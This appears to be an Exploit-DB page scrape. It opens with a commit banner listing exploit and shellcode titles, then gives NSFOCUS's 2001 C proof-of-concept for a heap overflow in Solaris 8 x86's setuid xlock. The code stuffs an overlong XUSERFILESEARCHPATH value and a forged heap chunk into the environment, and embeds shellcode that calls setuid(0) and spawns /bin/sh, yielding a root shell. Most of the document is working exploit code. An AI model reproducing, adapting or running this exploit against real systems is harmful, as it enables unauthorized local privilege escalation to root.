880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
95 lines
No EOL
3.4 KiB
C
95 lines
No EOL
3.4 KiB
C
// source: https://www.securityfocus.com/bid/3160/info
|
|
|
|
Xlock is a utility for locking X-windows displays. It is installed setuid root because it uses the user's password to authorize access to the display when it is locked.
|
|
|
|
The version of xlock that ships with Solaris as part of OpenWindows contains a heap overflow in it's handling of an environment variable.
|
|
|
|
Local attackers may be able to execute arbitrary code with effective privileges of xlock.
|
|
|
|
/*
|
|
* sol_x86_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
|
|
* Copyright (c) 2001 - Nsfocus.com
|
|
*
|
|
* Tested in Solaris 8 x86.
|
|
*
|
|
* DISCLAIMS:
|
|
* This is a proof of concept code. This code is for test purpose
|
|
* only and should not be run against any host without permission from
|
|
* the system administrator.
|
|
*
|
|
* NSFOCUS Security Team <security@nsfocus.com>
|
|
* http://www.nsfocus.com
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <strings.h>
|
|
#include <sys/types.h>
|
|
|
|
#define RETLOC 0x080463c8 /* default retrun address location (Solaris 8 x86) */
|
|
#define SP 0x08047ffc /* default "bottom" stack address (Solaris 8 x86) */
|
|
|
|
#define VULPROG "/usr/openwin/bin/xlock"
|
|
|
|
char shellcode[] =
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
"\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89"
|
|
"\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5"
|
|
"\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0"
|
|
"\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f"
|
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
|
|
"\xe2\x50\x52\x53\xb0\x3b\xff\xd5";
|
|
|
|
int
|
|
main(int argc, char **argv)
|
|
{
|
|
char buf[2048], fake_chunk[48];
|
|
long retaddr, sp_addr = SP;
|
|
char *arg[24], *env[24];
|
|
long retloc = RETLOC;
|
|
unsigned int *ptr;
|
|
char ev1[]="XUSERFILESEARCHPATH=";
|
|
long ev1_len;
|
|
long overbuflen = 1024;
|
|
|
|
if (argc > 1) /* adjust retloc */
|
|
retloc += atoi(argv[1]);
|
|
|
|
bzero(buf, sizeof(buf));
|
|
ev1_len = strlen(ev1);
|
|
memcpy(buf, ev1, ev1_len);
|
|
memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));
|
|
|
|
arg[0] = VULPROG;
|
|
arg[1] = NULL;
|
|
|
|
env[0] = shellcode; /* put shellcode in env */
|
|
env[1] = buf; /* put overflow environ */
|
|
env[2] = NULL; /* end of env */
|
|
|
|
/* get the not exact shellcode address :) */
|
|
retaddr = sp_addr - strlen(VULPROG) - 1
|
|
- strlen("i86pc") - 1
|
|
- strlen(buf) - 1
|
|
- strlen(shellcode) - 1;
|
|
|
|
printf("Using RET address = 0x%lx\n", retaddr);
|
|
printf("Using retloc = 0x%lx \n", retloc);
|
|
|
|
ptr = (unsigned int *) fake_chunk;
|
|
memset(fake_chunk, '\xff', sizeof(fake_chunk));
|
|
*(ptr + 0) = 0xfffffff9;
|
|
*(ptr + 2) = retaddr;
|
|
*(ptr + 8) = retloc - 8;
|
|
|
|
memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));
|
|
|
|
execve(VULPROG, arg, env);
|
|
perror("execle");
|
|
return(1);
|
|
} /* End of main */ |